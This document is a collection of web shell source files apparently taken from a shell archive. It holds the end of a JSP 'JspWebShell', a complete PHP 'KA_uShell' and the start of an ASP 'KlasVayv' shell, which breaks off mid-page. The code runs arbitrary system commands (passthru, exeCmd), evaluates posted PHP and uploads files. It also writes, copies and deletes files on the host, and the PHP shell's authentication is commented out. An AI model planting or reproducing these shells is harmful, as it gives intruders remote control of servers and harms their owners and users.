<td width="454" height="22" align="center" bgcolor="#000000" onclick="showsubmenu(1)"><font color=#FFFFFF><strong>JAVA相关参数</strong></font>
</td>
</tr>
<tr>
<td style="display" id='submenu1'>
<table border=0 width=99% cellspacing=1 cellpadding=3 bgcolor="#FFFFFF">
<tr bgcolor="#666666" height="22">
<td width="30%">&nbsp;名称</td>
<td width="50%" height="22">&nbsp;英文名称</td>
<td width="20%" height="22">&nbsp;版本</td>
</tr>
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
<td width="30%">&nbsp;JAVA运行环境名称</td>
<td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.runtime.name")%></td>
<td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.runtime.version")%></td>
</tr>
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
<td width="30%">&nbsp;JAVA运行环境说明书名称</td>
<td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.specification.name")%></td>
<td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.specification.version")%></td>
</tr>
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
<td width="30%">&nbsp;JAVA虚拟机名称</td>
<td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.vm.name")%></td>
<td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.vm.version")%></td>
</tr>
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
<td width="30%">&nbsp;JAVA虚拟机说明书名称</td>
<td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.vm.specification.name")%></td>
<td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.vm.specification.version")%></td>
</tr>
<%
float fFreeMemory=(float)Runtime.getRuntime().freeMemory();
float fTotalMemory=(float)Runtime.getRuntime().totalMemory();
float fPercent=fFreeMemory/fTotalMemory*100;
%>
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
<td height="22">&nbsp;JAVA虚拟机剩余内存</td>
<td height="22" colspan="2"><img width='8' height="12" align=absmiddle class=PicBar style="background-color: #000000">&nbsp;<%=fFreeMemory/1024/1024%>M
</td>
</tr>
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
<td height="22">&nbsp;JAVA虚拟机分配内存</td>
<td height="22" colspan="2"><img width='85%' align=absmiddle class=PicBar style="background-color: #000000">&nbsp;<%=fTotalMemory/1024/1024%>M
</td>
</tr>
</table>
<table border=0 width=99% cellspacing=1 cellpadding=3 bgcolor="#FFFFFF">
<tr bgcolor="#666666" height="22">
<td width="30%">&nbsp;参数名称</td>
<td width="70%" height="22">&nbsp;参数路径</td>
</tr>
<tr bgcolor="#999999" height="22">
<td width="30%">&nbsp;java.class.path </td>
<td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.class.path").replaceAll(env.queryHashtable("path.separator"),env.queryHashtable("path.separator")+"<br>&nbsp;")%>
</td>
</tr>
<tr bgcolor="#999999" height="22">
<td width="30%">&nbsp;java.home</td>
<td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.home")%></td>
</tr>
<tr bgcolor="#999999" height="22">
<td width="30%">&nbsp;java.endorsed.dirs</td>
<td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.endorsed.dirs")%></td>
</tr>
<tr bgcolor="#999999" height="22">
<td width="30%">&nbsp;java.library.path</td>
<td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.library.path").replaceAll(env.queryHashtable("path.separator"),env.queryHashtable("path.separator")+"<br>&nbsp;")%>
</td>
</tr>
<tr bgcolor="#999999" height="22">
<td width="30%">&nbsp;java.io.tmpdir</td>
<td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.io.tmpdir")%></td>
</tr>
</table>
</td>
</tr>
</table>
<br>
<div id="testspeed" align="center"> </div>
</CENTER></div>
<%}
else{
if (editfile!=null)//if edit
{
%>
<div id="Layer1" style="position:absolute; left:-17px; top:1029px; width:757px; height:250px; z-index:1">
<table width="99%" height="232" border="0">
<tr>
<td height="226"><form name="form2" method="post" action="">
<p align="center"> 地址:
<input name="editfile" type="text" value="<%=editfile%>" size="50">
</p>
<p align="center">
<textarea name="content" cols="105" rows="30"><%=readAllFile(editfile)%></textarea>
<input type="submit" name="Submit2" value="保存">
</p>
</form> </td>
</tr>
</table>
<p>&nbsp;</p></div>
<%}
else{%>
<table border="1" width="770" cellpadding="4" bordercolorlight="#999999" bordercolordark="#ffffff" align="center" cellspacing="0">
<tr bgcolor="#333333">
<td colspan="4" align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif" color="#ffffff">JspWebShell
version 1.0</font><font color="#FFFFFF">(网站目录:<%=config.getServletContext().getRealPath("/")%>)</font></td>
</tr>
<tr bgcolor="#999999">
<td colspan="4"> <font color="#000000">
<%
File[] fs = File.listRoots();
for (int i = 0; i < fs.length; i++){
%>
<a href="<%=selfName %>?path=<%=fs[i].getPath()%>\">本地磁盘(<%=fs[i].getPath()%>)
</a>
<%}%>
</font></td>
</tr>
<tr bgcolor="#999999">
<td height="10" colspan="4"> <font color="#000000">
<form name="form1" method="post" action="">
<input type="text" name="command" class="button">
<input type="submit" name="Submit" value="CMD命令执行" class="button">
</form>
</font> <p>
<%
String cmd = "";
InputStream ins = null;
String result = "";
if (request.getParameter("command") != null) {
cmd = (String)request.getParameter("command");result = exeCmd(cmd);%>
<%=result == "" ? "&nbsp;" : result%>
<%}%>
</td>
</tr>
<FORM METHOD="POST" ACTION="?up=true&path=<%String path1=config.getServletContext().getRealPath("/"); String tempfilepath=request.getParameter("path"); if(tempfilepath!=null) path1=tempfilepath;path1=path1.replaceAll("\\\\", "\\\\\\\\"); %><%=path1%>" ENCTYPE="multipart/form-data">
<tr bgcolor="#999999">
<td colspan="2"> <INPUT TYPE="FILE" NAME="FILE1" style="width:150" SIZE="50" class="button">
<INPUT TYPE="SUBMIT" VALUE="上传" class="button"> </td>
<td colspan="2"><a href="?jsptz=true" target="_blank">JSP探针</a> </td>
</tr>
</FORM>
<% String fileexe="";
String dir="";
String deldir="";
String scrfile="";
String dstfile="";
fileexe=request.getParameter("fileexe");
dir=request.getParameter("dir");
deldir=request.getParameter("deldir");
scrfile=request.getParameter("scrfile");
dstfile=request.getParameter("dstfile");
if (fileexe!=null)
{
//out.print(path+fileexe);
createFile(path+fileexe);
}
if (dir!=null)
{
//out.print(path+dir);
createFolder(path+dir);
}
if (deldir!=null)
{
//out.print(deldir);
DeleteFolder(deldir);
}
if (scrfile!=null&dstfile!=null)
{
//out.print(scrfile);
//out.print(dstfile);
copyfinish=fileCopy(scrfile, dstfile) ;
}
%>
<tr bgcolor="#CCCCCC">
<td height="10" colspan="2" bgcolor="#999999"> <form name="form3" method="post" action="">
文件夹名:
<input name="dir" type="text" size="10" class="button">
<input type="submit" name="Submit3" value="新建目录" class="button">
</form></td>
<td width="188" height="10" bgcolor="#999999"> <form name="form4" method="post" action="">
文件名:
<input name="fileexe" type="text" size="8" class="button">
<input type="submit" name="Submit4" value="新建文件" class="button">
</form></td>
<td width="327" height="10" bgcolor="#999999"><form name="form5" method="post" action="">
文件<input name="scrfile" type="text" size="15"class="button">
复制到
<input name="dstfile" type="text" size="15" class="button">
<input type="submit" name="Submit5" value="复制" class="button">
</form><font color="#FF0000"><%if(copyfinish==true) out.print("复制成功");%></font></td>
</tr>
<%//上传
String tempfilename="";
String up=request.getParameter("up");
// String tempfilepath=request.getParameter("filepath");
// out.print(tempfilepath);
if(up!=null)
{
tempfilename=(String)session.getId();
//String tempfilename=request.getParameter("file");
File f1=new File(tempfilepath,tempfilename);
int n;
try
{
InputStream in=request.getInputStream();
BufferedInputStream my_in=new BufferedInputStream(in);
FileOutputStream fout=new FileOutputStream(f1);
BufferedOutputStream my_out=new BufferedOutputStream(fout);
byte[] b=new byte[10000];
while((n=my_in.read(b))!=-1)
{
my_out.write(b,0,n);
}
my_out.flush();
my_out.close();
fout.close();
my_in.close();
in.close();
// out.print("文件创建成功!<br>");
}
catch(IOException e)
{
out.print("文件创建失败!");
}
try
{
RandomAccessFile random1=new RandomAccessFile(f1,"r");
random1.readLine();
String filename=random1.readLine();
byte[] b=filename.getBytes("ISO-8859-1");
filename=new String(b);
int pointer=filename.lastIndexOf('\\');
filename=filename.substring(pointer+1,filename.length()-1);
File f2=new File(tempfilepath,filename);
RandomAccessFile random2=new RandomAccessFile(f2,"rw");
random1.seek(0);
for(int i=1; i<=4; i++)
{
String tempstr=random1.readLine();
}
long startPoint=random1.getFilePointer();
random1.seek(random1.length());
long mark=random1.getFilePointer();
int j=0;
long endPoint=0;
while((mark>=0)&&(j<=5))
{
mark--;
random1.seek(mark);
n=random1.readByte();
if(n=='\n')
{
j++;
endPoint=random1.getFilePointer();
}
}
long length=endPoint-startPoint+1;
int order=(int)(length/10000);
int left=(int)(length%10000);
byte[] c=new byte[10000];
random1.seek(startPoint);
for(int i=0; i<order; i++)
{
random1.read(c);
random2.write(c);
}
random1.read(c,0,left);
random2.write(c,0,left);
random1.close();
random2.close();
f1.delete();
out.print("文件上传成功!");
}
catch(Exception e)
{
out.print("文件上传失败!");
}
}
%>
<tr>
<td width="196" height="48" valign="top" bgcolor="#999999">
<% try {
//path=request.getParameter("path");
//if(path==null)
//path=config.getServletContext().getRealPath("/");
File f=new File(path);
File[] fList= f.listFiles() ;
for (int j=0;j<fList.length;j++)
{
if (fList[j].isDirectory())
{%>
<a href="<%=selfName %>?path=<%=path%><%=fList[j].getName()%>\"> <%=fList[j].getName()%></a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href="?path=<%=path%>&deldir=<%=path%><%=fList[j].getName()%>">删除</a><br>
<% }
}//for
} catch (Exception e) {
System.out.println("不存在或没有权限");
}
%>
&nbsp; </td>
<td colspan="3" valign="top" bgcolor="#999999">
<% try {
path=request.getParameter("path");
if(path==null)
path=config.getServletContext().getRealPath("/");
File f=new File(path);
File[] fList= f.listFiles() ;
for (int j=0;j<fList.length;j++)
{
if (fList[j].isFile())
{//request.getContextPath()得到虚拟路径%>
<%=fList[j].getName()%>
<a href="?path=<%String tempfilepath1=request.getParameter("path"); if(tempfilepath!=null) path=tempfilepath;%><%=path%>&editfile=<%=path%><%=fList[j].getName()%>" target="_blank">编辑</a>
&nbsp; <a href="?action=del&path=<%=path%>&delfile=<%=path%><%=fList[j].getName()%>">删除</a><br>
<% }
}//for
} catch (Exception e) {
System.out.println("不存在或没有权限");
}
%>
</td>
</tr>
</table>
<p align="center">Power By 绝对零度[B.C.T] QQ:48124012</p>
<p align="center">&nbsp;</p>
<%}//if edit
}
}
%>
</body>
</html>

229
138shell/K/KAdot Universal Shell v0.1.6.html.txt Normal file
View file

@ -0,0 +1,229 @@
<!--
/+--------------------------------+\
| KA_uShell |
| <KAdot Universal Shell> |
| Version 0.1.6 |
| 13.03.04 |
| Author: KAdot <KAdot@ngs.ru> |
|--------------------------------|
\+ +/
-->
<html>
<head>
<title>KA_uShell 0.1.6</title>
<style type="text/css">
<!--
body, table{font-family:Verdana; font-size:12px;}
table {background-color:#EAEAEA; border-width:0px;}
b {font-family:Arial; font-size:15px;}
a{text-decoration:none;}
-->
</style>
</head>
<body>
<?php
$self = $_SERVER['PHP_SELF'];
$docr = $_SERVER['DOCUMENT_ROOT'];
$sern = $_SERVER['SERVER_NAME'];
$tend = "</tr></form></table><br><br><br><br>";
// Configuration
$login = "admin";
$pass = "123";
/*/ Authentication
if (!isset($_SERVER['PHP_AUTH_USER'])) {
header('WWW-Authenticate: Basic realm="KA_uShell"');
header('HTTP/1.0 401 Unauthorized');
exit;}
else {
if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass || empty($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']<>$login)
{ echo "×òî íàäî?"; exit;}
}
*/
if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
else {$ac = "shell";}
// Menu
echo "
|<a href=$self?ac=shell>Shell</a>|
|<a href=$self?ac=upload>File Upload</a>|
|<a href=$self?ac=tools>Tools</a>|
|<a href=$self?ac=eval>PHP Eval Code</a>|
|<a href=$self?ac=whois>Whois</a>|
<br><br><br><pre>";
switch($ac) {
// Shell
case "shell":
echo <<<HTML
<b>Shell</b>
<table>
<form action="$self" method="POST">
<input type="hidden" name="ac" value="shell">
<tr><td>
$$sern <input size="50" type="text" name="c"><input align="right" type="submit" value="Enter">
</td></tr>
<tr><td>
<textarea cols="100" rows="25">
HTML;
if (!empty($_POST['c'])){
passthru($_POST['c']);
}
echo "</textarea></td>$tend";
break;
//PHP Eval Code execution
case "eval":
echo <<<HTML
<b>PHP Eval Code</b>
<table>
<form method="POST" action="$self">
<input type="hidden" name="ac" value="eval">
<tr>
<td><textarea name="ephp" rows="10" cols="60"></textarea></td>
</tr>
<tr>
<td><input type="submit" value="Enter"></td>
$tend
HTML;
if (isset($_POST['ephp'])){
eval($_POST['ephp']);
}
break;
//Text tools
case "tools":
echo <<<HTML
<b>Tools</b>
<table>
<form method="POST" action="$self">
<input type="hidden" name="ac" value="tools">
<tr>
<td>
<input type="radio" name="tac" value="1">B64 Decode<br>
<input type="radio" name="tac" value="2">B64 Encode<br><hr>
<input type="radio" name="tac" value="3">md5 Hash
</td>
<td><textarea name="tot" rows="5" cols="42"></textarea></td>
</tr>
<tr>
<td> </td>
<td><input type="submit" value="Enter"></td>
$tend
HTML;
if (!empty($_POST['tot']) && !empty($_POST['tac'])) {
switch($_POST['tac']) {
case "1":
echo "Ðàñêîäèðîâàííûé òåêñò:<b>" .base64_decode($_POST['tot']). "</b>";
break;
case "2":
echo "Êîäèðîâàííûé òåêñò:<b>" .base64_encode($_POST['tot']). "</b>";
break;
case "3":
echo "Êîäèðîâàííûé òåêñò:<b>" .md5($_POST['tot']). "</b>";
break;
}}
break;
// Uploading
case "upload":
echo <<<HTML
<b>File Upload</b>
<table>
<form enctype="multipart/form-data" action="$self" method="POST">
<input type="hidden" name="ac" value="upload">
<tr>
<td>Ôàéëî:</td>
<td><input size="48" name="file" type="file"></td>
</tr>
<tr>
<td>Ïàïêà:</td>
<td><input size="48" value="$docr/" name="path" type="text"><input type="submit" value="Ïîñëàòü"></td>
$tend
HTML;
if (isset($_POST['path'])){
$uploadfile = $_POST['path'].$_FILES['file']['name'];
if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
echo "Ôàéëî óñïåøíî çàãðóæåí â ïàïêó $uploadfile\n";
echo "Èìÿ:" .$_FILES['file']['name']. "\n";
echo "Ðàçìåð:" .$_FILES['file']['size']. "\n";
} else {
print "Íå óäà¸òñÿ çàãðóçèòü ôàéëî. Èíôà:\n";
print_r($_FILES);
}
}
break;
// Whois
case "whois":
echo <<<HTML
<b>Whois</b>
<table>
<form action="$self" method="POST">
<input type="hidden" name="ac" value="whois">
<tr>
<td>Äîìåí:</td>
<td><input size="40" type="text" name="wq"></td>
</tr>
<tr>
<td>Õóéç ñåðâåð:</td>
<td><input size="40" type="text" name="wser" value="whois.ripe.net"></td>
</tr>
<tr><td>
<input align="right" type="submit" value="Enter">
</td></tr>
$tend
HTML;
if (isset($_POST['wq']) && $_POST['wq']<>"") {
if (empty($_POST['wser'])) {$wser = "whois.ripe.net";} else $wser = $_POST['wser'];
$querty = $_POST['wq']."\r\n";
$fp = fsockopen($wser, 43);
if (!$fp) {echo "Íå ìîãó îòêðûòü ñîêåò";} else {
fputs($fp, $querty);
while(!feof($fp)){echo fgets($fp, 4000);}
fclose($fp);
}}
break;
}
?>
</pre>
</body>
</html>

901
138shell/K/Klasvayv.asp.txt Normal file
View file

@ -0,0 +1,901 @@
<html>
<head>
<meta http-equiv="Content-Language" content="tr">
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<title>Aventis KlasVayv 1.0</title>
</head>
<body topmargin="0" leftmargin="0" bgcolor="#EAEAEA">
<script language="JavaScript">
<!--
function MM_openBrWindow(theURL,winName,features) { //v2.0
window.open(theURL,winName,features);
}
//-->
</script>
<%
if request.querystring("usklas") = "1" then
on error resume next
es=request.querystring("klas")
diez=server.urlencode(left(es,(instrRev(es,"\"))-1))
Select case es
case "C:" diez="C:"
case "D:" diez="D:"
end select
%>
<body topmargin="0" leftmargin="0"
onLoad="location.href='klasvayv.asp?klas=<%=diez%>&usak=1'">
<%
else
%>
<%
if request.querystring("dosyakaydet") <> "" then
set kaydospos=createobject("scripting.filesystemobject")
set kaydoses=kaydospos.createtextfile(request.querystring("dosyakaydet") & request("dosadi"))
set kaydoses=nothing
set kaydospos=nothing
set kaydospos=createobject("scripting.filesystemobject")
set kaydoses=kaydospos.opentextfile(request.querystring("dosyakaydet") & request("dosadi"), 2, true)
kaydoses.write request("duzenx")
set kaydoses=nothing
set kaydospos=nothing
end if
%>
<%
if request.querystring("yenidosya") <> "" then
%>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
<tr>
<td width="70" bgcolor="#000000" height="76">
<p align="center">
<img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
<td width="501" bgcolor="#000000" height="76" valign="top">
<font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
<span style="font-weight: 700">
<br>
AventGrup©<br>
</span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
<span style="font-weight: 700">
<br>
KlasVayv 1.0</span></font></td>
<td width="431" bgcolor="#000000" height="76" valign="top">
<p align="right"><span style="font-weight: 700">
<font face="Verdana" color="#858585" style="font-size: 2pt"><br>
</font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
<a href="http://www.aventgrup.net" style="text-decoration: none">
<font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
</font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
<a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
<font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
</tr>
<tr>
<td width="1004" height="1" bgcolor="#9F9F9F" colspan="3">
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
<tr>
<td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
<span style="font-size: 8pt">&nbsp;Çalýþýlan Klasör</span></font></td>
<td bgcolor="#D6D6D6" height="20">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
<tr>
<td width="1"></td>
<td><font face="Verdana" style="font-size: 8pt">&nbsp;<%=response.write(request.querystring("yenidosya"))%></font></td>
<td width="65">
&nbsp;</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
<tr>
<td width="100%" bgcolor="#000000">&nbsp;</td>
</tr>
<tr>
<td width="100%" bgcolor="#B7B7B7">
<form method="POST" action="klasvayv.asp?dosyakaydet=<%=request.querystring("yenidosya")%>&klas=<%=request.querystring("yenidosya")%>" name="kaypos">
<p align="center"><b><font size="1" face="Verdana">
<br>
Dosya Adý : <br>
</font>
</b><font
color="#FFFFFF" size="1" face="Arial">
<input
type="text" size="97" maxlength="32"
name="dosadi" value="Dosya Adý"
class="search"
onblur="if (this.value == '') this.value = 'Kullanýcý'"
onfocus="if (this.value == 'Kullanýcý') this.value=''"
style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"><br>
<br>
</font>
<b><font size="1" face="Verdana">
Ýçerik :&nbsp; <br>
</font>
<font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red">
<textarea name="duzenx"
style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
rows="24" cols="95" wrap="OFF"><%=sedx%></textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
<br>
</font></b>
<span class="gensmall">
<input type="submit" size="16"
name="duzenx1" value="Oluþtur"
style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
</span></p>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber19">
<tr>
<td width="100%" align="right" bgcolor="#000000">
<p align="center">
&nbsp;</td>
</tr>
</table>
</form>
</td>
</tr>
<tr>
<td width="100%" bgcolor="#EAEAEA">
<p align="right">
&nbsp;</td>
</tr>
</table>
<%
else
%>
<%
if request.querystring("klasorac") <> "" then
set doses=createobject("scripting.filesystemobject")
set es=doses.createfolder(request.querystring("aktifklas") & request("duzenx"))
set es=nothing
set doses=nothing
end if
%>
<%
if request.querystring("klasac") <> "" then
set aktifklas=request.querystring("aktifklas")
%>
<td width="65" bgcolor="#000000" height="76">
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber25" height="59">
<tr>
<td width="70" bgcolor="#000000" height="76">
<p align="center">
<img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
<td width="501" bgcolor="#000000" height="76" valign="top">
<font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
<span style="font-weight: 700">
<br>
AventGrup©<br>
</span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
<span style="font-weight: 700">
<br>
KlasVayv 1.0</span></font></td>
<td width="431" bgcolor="#000000" height="76" valign="top">
<p align="right"><span style="font-weight: 700">
<font face="Verdana" color="#858585" style="font-size: 2pt"><br>
</font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
<a href="http://www.aventgrup.net" style="text-decoration: none">
<font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
</font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
<a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
<font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
</tr>
</table>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
<tr>
<td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
<span style="font-size: 8pt">&nbsp;Çalýþýlan Alan</span></font></td>
<td bgcolor="#D6D6D6" height="20">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
<tr>
<td width="1"></td>
<td><font face="Verdana" style="font-size: 8pt">&nbsp;<%=aktifklas%></font></td>
<td width="65">
&nbsp;</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="174">
<tr>
<td width="100%" bgcolor="#000000" height="19">&nbsp;</td>
</tr>
<tr>
<td width="100%" bgcolor="#C5C5C5" height="134">
<form method="POST" action="klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%>" name="klaspos">
<p align="center"><font
color="#FFFFFF" size="1" face="Arial">
<input
type="text" size="37" maxlength="32"
name="duzenx" value="Klasör Adý"
class="search"
onblur="if (this.value == '') this.value = 'Kullanýcý'"
onfocus="if (this.value == 'Kullanýcý') this.value=''"
style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center">&nbsp;&nbsp;
<br>
<br>
<br>
</font>
<span class="gensmall">
<input type="submit" size="16"
name="duzenx1" value="Oluþtur"
style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
</span></span><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
&nbsp;</font></td>
</tr>
<tr>
<td width="100%" bgcolor="#000000" height="19">&nbsp;</td>
</tr>
<tr>
<%
else
%>
<%
if request.querystring("suruculer") <> "" then
%>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
<tr>
<td width="70" bgcolor="#000000" height="76">
<p align="center">
<img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
<td width="501" bgcolor="#000000" height="76" valign="top">
<font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
<span style="font-weight: 700">
<br>
AventGrup©<br>
</span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
<span style="font-weight: 700">
<br>
KlasVayv 1.0</span></font></td>
<td width="431" bgcolor="#000000" height="76" valign="top">
<p align="right"><span style="font-weight: 700">
<font face="Verdana" color="#858585" style="font-size: 2pt"><br>
</font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
<a href="http://www.aventgrup.net" style="text-decoration: none">
<font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
</font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
<a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
<font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
</tr>
<tr>
<td width="1004" height="1" bgcolor="#9F9F9F" colspan="3">
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="4">
<tr>
<td width="110" bgcolor="#9F9F9F" height="4">
<span style="font-size: 2pt">&nbsp;</span></td>
</tr>
</table>
</td>
</tr>
</table>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="153">
<tr>
<td width="100%" height="19" bgcolor="#000000">&nbsp;</td>
</tr>
<tr>
<td width="100%" height="113" bgcolor="#E1E1E1">&nbsp;<div align="center">
<center>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="484" id="AutoNumber2" height="17">
<tr>
<td width="208" height="17" align="center" bgcolor="#C5C5C5">
<font face="Verdana" style="font-size: 8pt">Sürücü Adý</font></td>
<td width="75" height="17" align="center" bgcolor="#C5C5C5">
<font face="Verdana" style="font-size: 8pt">Boyutu</font></td>
<td width="75" height="17" align="center" bgcolor="#C5C5C5">
<font face="Verdana" style="font-size: 8pt">Boþ Alan</font></td>
<td width="64" height="17" align="center" bgcolor="#C5C5C5">
<font face="Verdana" style="font-size: 8pt">Durum</font></td>
<td width="62" height="17" align="center" bgcolor="#C5C5C5">
<font face="Verdana" style="font-size: 8pt">Ýþlem</font></td>
</tr>
</table>
</center>
</div>
<div align="center">
<center>
<%
set klassis =server.createobject("scripting.filesystemobject")
set klasdri=klassis.drives
%>
<%
for each dongu in klasdri
%>
<%
if dongu.driveletter <> "A" then
if dongu.isready=true then
%>
<%
select case dongu.drivetype
case 0 teype="Diðer"
case 1 teype="Taþýnýr"
case 2 teype="HDD"
case 3 teype="NetWork"
case 4 teype="CD-Rom"
case 5 teype="FlashMem"
end select
%>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="484" id="AutoNumber3" height="17">
<tr>
<td width="208" height="17" align="left" bgcolor="#EEEEEE">
<font face="Verdana" style="font-size: 8pt">&nbsp;<%=dongu.driveletter%>:\ ( <%=dongu.filesystem%> )</font></td>
<td width="75" height="17" align="center" bgcolor="#E0E0E0">
<font face="Verdana" style="font-size: 8pt"><%=Round(dongu.totalsize/(1024*1024),1)%> MB</font></td>
<td width="75" height="17" align="center" bgcolor="#E0E0E0">
<font face="Verdana" style="font-size: 8pt"><%=Round(dongu.availablespace/(1024*1024),1)%> MB</font></td>
<td width="64" height="17" align="center" bgcolor="#E0E0E0">
<font face="Verdana" style="font-size: 8pt"><%=teype%>&nbsp;</font></td>
<td width="62" height="17" align="center" bgcolor="#E0E0E0">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber24">
<tr>
